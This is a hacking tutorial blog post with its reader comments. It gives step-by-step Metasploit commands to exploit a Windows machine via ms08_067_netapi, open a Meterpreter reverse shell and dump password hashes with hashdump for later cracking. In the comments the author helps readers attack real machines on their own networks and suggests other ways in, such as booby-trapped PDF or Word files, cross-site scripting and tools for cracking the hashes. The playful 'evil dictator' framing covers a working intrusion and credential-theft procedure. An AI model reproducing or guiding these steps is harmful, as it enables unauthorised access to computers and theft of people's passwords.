Hack Like a Pro: How to Remotely Grab Encrypted Passwords from a Compromised Computer

How to Remotely Grab Encrypted Passwords from a Compromised Computer

Welcome back, my fledgling hackers!

There's an evil dictator hellbent on destroying the world, and in one of our last hacks, we successfully compromised his computer and saved the world from nuclear annihilation. Then, we covered our tracks so no one would know what we did, and developed a hack to capture screenshots of his computer periodically so we could track of what he was up to next.

With this new hack, we'll capture the passwords from the maniacal dictator's computer so that we can access his PC through his account— or anyone else's account on his computer, including the most important account—the system administrator's.

Windows systems store passwords in encrypted form inside a file called the SAM file. This file resides in the c:\windows\system32\config\sam directory. If we can gain access to his computer, as we've already done, we can grab a copy of the encrypted passwords, transfer them to our computer, and then crack them later at our leisure.

So, let's fire up our trusty framework hacking tool, Metasploit, and let's go grab those passwords!

Step 1: Compromise the System

Once again, let's use a tried and true exploit; type:

  • msf > use exploit/windows/smb/ms08_067_netapi

Now, let's set the payload to our all powerful Meterpreter.

  • msf (ms08_067_netapi) > set payload /windows/meterpreter/reverse_tcp

It's always a good idea now to check our options.

As you can see, we'll need both the LHOST (the IP address of our computer) and RHOST (the IP address of the victim computer). Let's set these now.

  • msf (ms08_067_netapi) > set RHOST 192.168.1.108
  • msf (ms08_067_netapi) > set LHOST 192.168.1.109

With everything set, now all that's left to do is exploit!

  • msf (ms08_067_netapi) > exploit

We now have a Meterpreter terminal prompt on the maniacal dictator's computer!

Step 2: Grab the Password File

As you've seen in my previous tutorials, the Meterpreter has several powerful scripts built in. In this case, we'll be using one called hashdump.

Just a bit of explanation before we grab those passwords...

For security purposes, most operating systems (including all of the modern Windows operating systems) store the user passwords in hashes. This is a one-way encryption that make the passwords unreadable to humans. These are the hashes we're after, hence the script is called hashdump.

So, let's go ahead and grab those hashes!

  • meterpreter > hashdump

As you can see, we now have several users and their encrypted password hashes. Of course, right now we can't read them, but come back for my next tutorial and I'll show you how to crack them so that we can use them at our leisure.

Remember, once we have the maniacal dictator's password, it's likely that he uses that same password on systems other than this one (i.e. email, secure areas, etc.), giving us access to many of his secure assets.

Photos by Andrey Popov / Shutterstock, Rob Hyrons / Shutterstock, Maksim Kabakou / Shutterstock

36 Comments

my idea is DO NOT HACK IT IS THE WRONG THING TO DO AND SCREWS UP A COMPUTER. i did it and my computer got screwd so i had to get a new one

Hell Master:

Sorry to hear about your computer. If you had done the hack correctly, you computer would be fine. I recommend you spend a little time studying my tutorials.

OTW

Hi thanks for this tutorial. Do you have to be connected to the local network right? I mean your PC and the dictator's have to be connected to local network?

BackTrack Hack:

Not necessarily. The example I showed here, they are on the same network, but you can connect to any computer on the Internet, if you can reach it.

OTW

i'm new here, but I've noticed you basically control the Null Byte section of this site and I'm already a fan of these super easy tutorials. I was curious if you're still using Ubuntu, or if you are using the new Kali 1.0 Debian based sys.

Sky Captain:

We will be moving to Kali in coming weeks. BackTrack 5r3 is still a very viable hacking system and is still used by most hackers and penetration testers.

I'll be progressing to more advanced hacks as time goes on.

OTW

i can t find th3 beginin of your guide :(

Hello. As you can see, I have a little problem.. I was trying to compromise a windows pc and I couldn´t.. can someone help me?

Marito:

Thanks for that image. That helps a lot.

It looks like the host is unreachable. Do you have the correct IP address? Is there a firewall between you and the remote host?

OTW

I have the right IP adress and yes, there are a firewall. what should I do?

Marito:

Some info would be useful. The IP address is a private IP. It should be on your internal network. Generally, firewalls block external traffic. Where are you trying to hack?

Also, what is the OS of the victim system?

OTW

I´m at home trying to hack another computer (windows OS) wich is next to me.. We are on the same network..

Marito:

What is your IP address?

Which Windows? 7, 8, 2008, XP, 2003?

Windows 7..
Mine: 192.168.1.65
The other: 192.168.1.66

Marito:

The hack you hack chosen won't work on Windows 7, but that doesn't explain why the host is unreachable. You might try using a hack that embeds the meterpreter in a PDF or Word doc or cross site scripting.

OTW

Ok. I will try. Thanks :)

what is the command to grab encrypted passwords from windows 7 ?

Rico:

There is no single password to gran encrypted passwords in Win 7. You need to compromise the system and then get the meterpreter on it and then run hashdump.

If you have physical access, you can use pwdump with Cain and Abel.

OTW

OTW :

Thanks, and do you have tutorial about using pwdump with Cain and Abel in backtrack ?

c:\windows\system32\config\ folder is empty
... what should i do ?
Its because i am on admin acc ?

Koly:

I'm sorry, but I don't understand your question?

OTW

empty folder-.-
my admin acc have password..but there is no folder called SAM or any other file.

Hey listen @KOLY CRAFTER....U are at the wrong point
SAM dosn't exists there as there are two such places
in windows and you are at the wrong one,,,get
Over this... C:\windows\system32\config....you will
surely encouter SAM Here but u won't be able 2 view
the encrypted contents,,,neither copy or move SAM
.
.
@METASPLOIT might help you or else I have the permanent soln.

I need ur help @OCCUPIT HEWEB,,,i sumhow managed to
get SAM in my thumb...i took it 2 an other system,,,still
unable to decrypt it...plz give a perm. Soln. 4 dis damn ISSUE

Genuine:

Do you have Cain and Abel or John the Ripper? Either one can decrypt the passwords?

OTW

OTW :
thanks for your suggestion I will soon reply weather it worked or not

Hi OTW, I've exploited a Windows 7 PC and gotten meterpreter on it, when I attempt to use hashdump and it responds with "priv passw get sam hashes: Operation failed: The parameter is incorrect. I've tried a few things but I cannot figure out how to fix this error.

Thanks

hi OTW ..i have a problem..plz help

set payload /windows/meterpreter/reversetcp

in this command...it shows wrong location

What does that mean, "wrong location"?

when i enter this command: set payload /windows/meterpreter/reversetcp

it show

The value specified for payload is not valid.

plz help OTW

First, check your spelling. Second, not every payload is compatible with every exploit. What exploit are you using?

@OCCUPYTHEWEB I have the same problem like MehulVerma...i tried to set the payload for the ms08067netapi, like written in the article, but it says "the value specified for payload is not valid"...i used the /windows/meterpreter/reversetcp for the payload...plz help :)

I previously had this problem also. In your command on here you are not putting the underscore in reversetcp.

Furthermore, the slash before windows stopped mine from working. i was using it as /windows/meterpreter/reversetcp and it didn't work, but as soon as I removed the slash before windows at the start to change it to windows/meterpreter/reversetcp, it worked :)

Hope this helped :)

Can i hack the pass account win7 computer in my LAN

Hello, How can we get RHOST of victim's computer when we try to hack into their system? How do we find out their IP address?

Share Your Thoughts

  • Hot
  • Latest